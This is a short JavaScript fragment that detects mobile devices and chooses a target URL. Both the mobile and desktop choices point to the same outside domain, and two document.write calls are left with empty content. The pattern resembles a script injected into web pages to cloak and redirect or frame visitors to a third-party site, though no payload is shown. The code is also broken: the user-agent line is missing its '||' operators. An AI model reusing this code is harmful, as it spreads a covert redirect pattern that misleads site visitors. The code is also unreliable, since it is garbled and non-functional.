function isMobile() { const ua = navigator.userAgent navigator.vendor window.opera; return /phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/i.test(ua) && navigator.maxTouchPoints > 0; } const mobileUrl = "https://nj.ccutu.com/kasa/"; const desktopUrl = "https://nj.ccutu.com/kasa/"; const targetUrl = isMobile() ? mobileUrl : desktopUrl; document.write(` `); document.write(` `);